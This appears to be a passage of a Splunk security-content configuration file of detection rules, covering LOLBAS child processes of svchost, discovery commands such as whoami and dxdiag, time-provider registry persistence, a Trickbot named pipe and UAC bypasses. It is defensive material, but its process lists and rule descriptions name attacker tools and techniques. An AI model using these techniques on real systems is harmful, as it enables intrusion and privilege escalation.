= The following analytic is designed to spot instances of 'svchost.exe' initiating a Living Off The Land Binaries and Scripts (LOLBAS) execution process. Often, adversaries manipulate Task Scheduler to execute code on remote endpoints, resulting in the spawning of a malicious command as a child process of 'svchost.exe'. By tracking child processes of 'svchost.exe' that align with the LOLBAS project, potential lateral movement activity can be detected. The analytic examines process details, including the process name, parent process, and command-line executions. A comprehensive list of LOLBAS processes is included in the search parameters. Although the analytic might catch legitimate applications exhibiting this behavior, these instances should be filtered accordingly. The findings from this analytic offer valuable insight into potentially malicious activities on an endpoint. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate applications may trigger this behavior, filter as needed. action.escu.creation_date = 2021-11-22 action.escu.modification_date = 2021-11-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Svchost LOLBAS Execution Process Spawn - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = Svchost.exe spawned a LOLBAS process on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Svchost LOLBAS Execution Process Spawn - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to spot instances of 'svchost.exe' initiating a Living Off The Land Binaries and Scripts (LOLBAS) execution process. Often, adversaries manipulate Task Scheduler to execute code on remote endpoints, resulting in the spawning of a malicious command as a child process of 'svchost.exe'. By tracking child processes of 'svchost.exe' that align with the LOLBAS project, potential lateral movement activity can be detected. The analytic examines process details, including the process name, parent process, and command-line executions. A comprehensive list of LOLBAS processes is included in the search parameters. Although the analytic might catch legitimate applications exhibiting this behavior, these instances should be filtered accordingly. The findings from this analytic offer valuable insight into potentially malicious activities on an endpoint. action.notable.param.rule_title = Svchost LOLBAS Execution Process Spawn action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=svchost.exe) (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe", "Rasautou.exe", "Schtasks.exe", "Xwizard.exe", "Pnputil.exe", "Atbroker.exe", "Pcwrun.exe", "Ttdinject.exe","Mshta.exe", "Bitsadmin.exe", "Certoc.exe", "Ieexec.exe", "Microsoft.Workflow.Compiler.exe", "Runscripthelper.exe", "Forfiles.exe", "Msbuild.exe", "Register-cimprovider.exe", "Tttracer.exe", "Ie4uinit.exe", "Bash.exe", "Hh.exe", "SettingSyncHost.exe", "Cmstp.exe", "Stordiag.exe", "Scriptrunner.exe", "Odbcconf.exe", "Extexport.exe", "Msdt.exe", "WorkFolders.exe", "Diskshadow.exe", "Mavinject.exe", "Regasm.exe", "Gpscript.exe", "Regsvr32.exe", "Msiexec.exe", "Wuauclt.exe", "Presentationhost.exe", "Wmic.exe", "Runonce.exe", "Syncappvpublishingserver.exe", "Verclsid.exe", "Infdefaultinstall.exe", "Installutil.exe", "Netsh.exe", "Wab.exe", "Dnscmd.exe", "At.exe", "Pcalua.exe", "Msconfig.exe")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `svchost_lolbas_execution_process_spawn_filter` [ESCU - System Info Gathering Using Dxdiag Application - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious dxdiag.exe process command-line execution. Dxdiag is used to collect the system info of the target host. This technique has been used by Remcos RATS, various actors, and other malware to collect information as part of the recon or collection phase of an attack. This behavior should rarely be seen in a corporate network, but this command line can be used by a network administrator to audit host machine specifications. Thus in some rare cases, this detection will contain false positives in its results. To triage further, analyze what commands were passed after it pipes out the result to a file for further processing. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1592"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious dxdiag.exe process command-line execution. Dxdiag is used to collect the system info of the target host. This technique has been used by Remcos RATS, various actors, and other malware to collect information as part of the recon or collection phase of an attack. This behavior should rarely be seen in a corporate network, but this command line can be used by a network administrator to audit host machine specifications. Thus in some rare cases, this detection will contain false positives in its results. To triage further, analyze what commands were passed after it pipes out the result to a file for further processing. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This commandline can be used by a network administrator to audit host machine specifications. Thus, a filter is needed. action.escu.creation_date = 2021-11-19 action.escu.modification_date = 2021-11-19 action.escu.confidence = high action.escu.full_search_name = ESCU - System Info Gathering Using Dxdiag Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - System Info Gathering Using Dxdiag Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1592"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_dxdiag` AND Processes.process = "* /t *" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `system_info_gathering_using_dxdiag_application_filter` [ESCU - System Information Discovery Detection - Rule] action.escu = 0 action.escu.enabled = 1 description = Detect system information discovery techniques used by attackers to understand configurations of the system to further exploit it. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Detect system information discovery techniques used by attackers to understand configurations of the system to further exploit it. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators debugging servers action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - System Information Discovery Detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques"] action.risk = 1 action.risk.param._risk_message = Potential system information discovery behavior on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - System Information Discovery Detection - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Detect system information discovery techniques used by attackers to understand configurations of the system to further exploit it. action.notable.param.rule_title = System Information Discovery Detection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*wmic* qfe*" OR Processes.process=*systeminfo* OR Processes.process=*hostname*) by Processes.user Processes.process_name Processes.process Processes.dest Processes.parent_process_name | `drop_dm_object_name(Processes)` | eventstats dc(process) as dc_processes_by_dest by dest | where dc_processes_by_dest > 2 | stats values(process) as process min(firstTime) as firstTime max(lastTime) as lastTime by user, dest parent_process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `system_information_discovery_detection_filter` [ESCU - System Processes Run From Unexpected Locations - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for system processes that typically execute from `C:\Windows\System32\` or `C:\Windows\SysWOW64`. This may indicate a malicious process that is trying to hide as a legitimate process.\ This detection utilizes a lookup that is deduped `system32` and `syswow64` directories from Server 2016 and Windows 10.\ During triage, review the parallel processes - what process moved the native Windows binary? identify any artifacts on disk and review. If a remote destination is contacted, what is the reputation? action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1036.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for system processes that typically execute from `C:\Windows\System32\` or `C:\Windows\SysWOW64`. This may indicate a malicious process that is trying to hide as a legitimate process.\ This detection utilizes a lookup that is deduped `system32` and `syswow64` directories from Server 2016 and Windows 10.\ During triage, review the parallel processes - what process moved the native Windows binary? identify any artifacts on disk and review. If a remote destination is contacted, what is the reputation? action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This detection may require tuning based on third party applications utilizing native Windows binaries in non-standard paths. action.escu.creation_date = 2020-12-08 action.escu.modification_date = 2020-12-08 action.escu.confidence = high action.escu.full_search_name = ESCU - System Processes Run From Unexpected Locations - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions", "Unusual Processes", "Ransomware", "Masquerading - Rename System Utilities", "Qakbot", "Windows Error Reporting Service Elevation of Privilege Vulnerability", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = A System process $process_name$ is running from $process_path$ on $dest$, potentially non-standard. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - System Processes Run From Unexpected Locations - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions", "Unusual Processes", "Ransomware", "Masquerading - Rename System Utilities", "Qakbot", "Windows Error Reporting Service Elevation of Privilege Vulnerability", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1036.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_path !="C:\\Windows\\System32*" Processes.process_path !="C:\\Windows\\SysWOW64*" by Processes.dest Processes.user Processes.parent_process Processes.process_path Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `is_windows_system_file` | `system_processes_run_from_unexpected_locations_filter` [ESCU - System User Discovery With Query - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `query.exe` with command-line arguments utilized to discover the logged user. Red Teams and adversaries alike may leverage `query.exe` to identify system users on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `query.exe` with command-line arguments utilized to discover the logged user. Red Teams and adversaries alike may leverage `query.exe` to identify system users on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-13 action.escu.modification_date = 2021-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - System User Discovery With Query - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - System User Discovery With Query - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="query.exe") (Processes.process=*user*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `system_user_discovery_with_query_filter` [ESCU - System User Discovery With Whoami - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `whoami.exe` without any arguments. This windows native binary prints out the current logged user. Red Teams and adversaries alike may leverage `whoami.exe` to identify system users on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `whoami.exe` without any arguments. This windows native binary prints out the current logged user. Red Teams and adversaries alike may leverage `whoami.exe` to identify system users on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - System User Discovery With Whoami - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Winter Vivern", "Active Directory Discovery", "Rhysida Ransomware", "Qakbot", "CISA AA23-347A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - System User Discovery With Whoami - Rule action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "Active Directory Discovery", "Rhysida Ransomware", "Qakbot", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="whoami.exe") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `system_user_discovery_with_whoami_filter` [ESCU - Time Provider Persistence Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious modification of time provider registry for persistence and autostart. This technique can allow the attacker to persist on the compromised host and autostart as soon as the machine boot up. This TTP can be a good indicator of suspicious behavior since this registry is not commonly modified by normal user or even an admin. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.003", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious modification of time provider registry for persistence and autostart. This technique can allow the attacker to persist on the compromised host and autostart as soon as the machine boot up. This TTP can be a good indicator of suspicious behavior since this registry is not commonly modified by normal user or even an admin. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Time Provider Persistence Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hermetic Wiper", "Windows Privilege Escalation", "Windows Persistence Techniques", "Windows Registry Abuse", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Time Provider Persistence Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Windows Privilege Escalation", "Windows Persistence Techniques", "Windows Registry Abuse", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.003", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious modification of time provider registry for persistence and autostart. This technique can allow the attacker to persist on the compromised host and autostart as soon as the machine boot up. This TTP can be a good indicator of suspicious behavior since this registry is not commonly modified by normal user or even an admin. action.notable.param.rule_title = Time Provider Persistence Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\CurrentControlSet\\Services\\W32Time\\TimeProviders*") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `time_provider_persistence_registry_filter` [ESCU - Trickbot Named Pipe - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to detect potential trickbot infection through the create/connected named pipe to the system. This technique is used by trickbot to communicate to its c2 to post or get command during infection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = this search is to detect potential trickbot infection through the create/connected named pipe to the system. This technique is used by trickbot to communicate to its c2 to post or get command during infection. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and pipename from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. . action.escu.known_false_positives = unknown action.escu.creation_date = 2021-04-26 action.escu.modification_date = 2021-04-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Trickbot Named Pipe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Trickbot"] action.risk = 1 action.risk.param._risk_message = Possible Trickbot namedpipe created on $dest$ by $process_name$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Trickbot Named Pipe - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is to detect potential trickbot infection through the create/connected named pipe to the system. This technique is used by trickbot to communicate to its c2 to post or get command during infection. action.notable.param.rule_title = Trickbot Named Pipe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode IN (17,18) PipeName="\\pipe\\*lacesomepipe" | stats min(_time) as firstTime max(_time) as lastTime count by dest user_id EventCode PipeName signature Image process_id | rename Image as process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `trickbot_named_pipe_filter` [ESCU - UAC Bypass MMC Load Unsigned Dll - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious loaded unsigned dll by MMC.exe application. This technique is commonly seen in attacker that tries to bypassed UAC feature or gain privilege escalation. This is done by modifying some CLSID registry that will trigger the mmc.exe to load the dll path action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548", "T1218.014"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious loaded unsigned dll by MMC.exe application. This technique is commonly seen in attacker that tries to bypassed UAC feature or gain privilege escalation. This is done by modifying some CLSID registry that will trigger the mmc.exe to load the dll path action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and imageloaded executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown. all of the dll loaded by mmc.exe is microsoft signed dll. action.escu.creation_date = 2021-07-12 action.escu.modification_date = 2021-07-12 action.escu.confidence = high action.escu.full_search_name = ESCU - UAC Bypass MMC Load Unsigned Dll - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = Suspicious unsigned $ImageLoaded$ loaded by $Image$ on endpoint $dest$ with EventCode $EventCode$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - UAC Bypass MMC Load Unsigned Dll - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548", "T1218.014"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious loaded unsigned dll by MMC.exe application. This technique is commonly seen in attacker that tries to bypassed UAC feature or gain privilege escalation. This is done by modifying some CLSID registry that will trigger the mmc.exe to load the dll path action.notable.param.rule_title = UAC Bypass MMC Load Unsigned Dll action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded = "*.dll" Image = "*\\mmc.exe" Signed=false Company != "Microsoft Corporation" | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded Signed ProcessId OriginalFileName dest EventCode Company | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uac_bypass_mmc_load_unsigned_dll_filter` [ESCU - UAC Bypass With Colorui COM Object - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a possible uac bypass using the colorui.dll COM Object. this technique was seen in so many malware and ransomware like lockbit where it make use of the colorui.dll COM CLSID to bypass UAC. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a possible uac bypass using the colorui.dll COM Object. this technique was seen in so many malware and ransomware like lockbit where it make use of the colorui.dll COM CLSID to bypass UAC. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = not so common. but 3rd part app may load this dll. action.escu.creation_date = 2021-08-13 action.escu.modification_date = 2021-08-13 action.escu.confidence = high action.escu.full_search_name = ESCU - UAC Bypass With Colorui COM Object - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Ransomware", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 48}, {"risk_object_field": "ImageLoaded", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = 